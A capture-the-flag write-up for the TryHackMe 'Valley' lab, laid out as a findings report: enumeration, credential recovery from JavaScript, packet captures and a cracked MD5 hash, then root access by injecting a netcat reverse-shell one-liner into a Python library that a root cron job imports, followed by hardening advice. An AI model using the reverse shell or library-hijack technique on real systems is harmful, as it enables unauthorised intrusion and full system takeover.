Vally (TryHackMe Challange):

--- # **Valley (TryHackMe Challenge) – Findings & Recommendations Report** --- ## **1️⃣ Port Scanning** ### **1.1 Nmap Scan** ```bash nmap -v -sS <target IP> ``` **Open Ports:** | Port | State | Service | | ---- | ----- | ------- | | 22 | open | SSH | | 80 | open | HTTP | **Website Findings:** * Image gallery contained **unencrypted, hierarchical, and insecure paths**. * Accessing URLs beyond the last image revealed **web server type and version**: ``` Apache/2.4.41 (Ubuntu) Server at 10.10.149.238 Port 80 ``` ### **1.2 RustScan** ```bash rustscan -a 10.10.125.123 ``` **Open Ports:** * 22/tcp – SSH * 80/tcp – HTTP * 37370/tcp – FTP (**unusual port**) --- ## **2️⃣ Website Enumeration** ### **2.1 Initial Search** * No sensitive findings on homepage. ### **2.2 Directory Brute-Forcing** ```bash gobuster dir -u http://10.10.125.123 -w directory-list-lowercase-2.3-medium.txt ``` **Discovered Directories:** | Path | Status | Notes | | -------------- | ------ | ------------------------ | | /gallery | 301 | Linked from homepage | | /static | 301 | Not linked from homepage | | /pricing | 301 | Linked from homepage | | /server-status | 403 | Restricted | --- ## **3️⃣ Suspicious URL Enumeration** ```bash gobuster dir -u http://10.10.125.123/static/ -w directory-list-lowercase-2.3-medium.txt ``` * `/00` – only **127 bytes** → **suspicious** * Other directories `/1` … `/18` corresponded to **image files** --- ## **4️⃣ Hidden Dev Notes & Login** * Developer notes at `/dev1243224123123/` included: ``` - add wedding photo examples - redo editing on #4 - remove /dev1243224123123 - check for SIEM alerts ``` * Login page JS revealed **hardcoded credentials**: ```javascript if (username === "siemDev" && password === "california") ``` **Credentials:** * **Username:** siemDev * **Password:** california --- ## **5️⃣ FTP Access** ```bash ftp 10.10.107.34 37370 ``` * Directory Listing: ``` -rw-rw-r-- 1 1000 1000 7272 siemFTP.pcapng -rw-rw-r-- 1 1000 1000 1978716 siemHTTP1.pcapng -rw-rw-r-- 1 1000 1000 1972448 siemHTTP2.pcapng ``` * Download `.pcapng` files → **Wireshark analysis** * Found credentials in HTTP POST: ``` userName: valleyDev password: ph0t0s1234 ``` --- ## **6️⃣ SSH Access** ```bash ssh valleyDev@10.10.89.228 ``` * **User flag:** ``` h3THM{k@l1_1n_th3_v@lley} ``` --- ## **7️⃣ Privilege Escalation – Root Access** ### **7.1 File Discovery** * `/home/valley/valleyAuthenticator` – **encrypted binary** ### **7.2 Local Analysis** ```bash scp valleyDev@10.10.157.63:/home/valleyAuthenticator /root/ strings valleyAuthenticator ``` * UPX compression detected: ``` UPX! ``` * Decompress: ```bash upx -d valleyAuthenticator ``` ### **7.3 Extracting Credentials** * Found hashed password: ``` ****e6722920bab2326f8217e4bf6b1b58ac**** ``` * Crack using John the Ripper: ```bash john --wordlist=/root/Tools/wordlists/rockyou.txt --format=raw-md5 passToCrack.txt ``` * **Recovered credentials:** * Username: valley * Password: liberty123 --- ## **8️⃣ SSH Access as Valley User** ```bash ssh valley@10.10.253.236 scp /opt/PEAS/linPEAS/linpeas.sh valley@10.10.253.236:/home/valley/ bash linpeas.sh 2>&1 | tee linpeas_output.txt ``` * LinPEAS revealed **no notable misconfigurations** --- ## **9️⃣ Privilege Escalation via Cron & Python Library Injection** * `/etc/crontab` contained: ``` 1 * * * * root python3 /photos/script/photosEncrypt.py ``` * Could not modify crontab directly. * Injected **reverse shell** via Python library `base64.py`: ```python import os os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.205.94 9001 >/tmp/f') ``` * Listener on attack machine: ```bash nc -l 9001 ``` * **Root shell obtained** ```bash whoami root ``` --- ## **🔟 Root Flag** ```bash cat /root/root.txt THM{v@lley_0f_th3_sh@d0w_0f_pr1v3sc} ``` --- ## **11️⃣ Recommendations & Hardening** 1. **SSH Security** * Disable password-based SSH login; enforce key-based authentication. * Restrict SSH access to trusted IPs only. 2. **Web Server** * Remove unlinked directories (e.g., `/static/00`). * Secure sensitive paths. * Enable HTTPS and secure session management. 3. **FTP** * Avoid unusual ports and anonymous access. * Use strong passwords and IP restrictions. 4. **Cron Jobs** * Limit root-level cron scripts to trusted binaries only. * Enforce strict file permissions. 5. **Binary Protection** * Do not store credentials in binaries. * Use environment variables or secure vaults. 6. **Monitoring & Alerting** * File integrity monitoring. * Audit unusual ports and unexpected services. --- ✅ **Conclusion:** The attack chain executed fully: reconnaissance → FTP access → SSH access → reverse engineering → privilege escalation → root flag retrieval. Implementing the above recommendations will significantly reduce risk from similar attacks. ---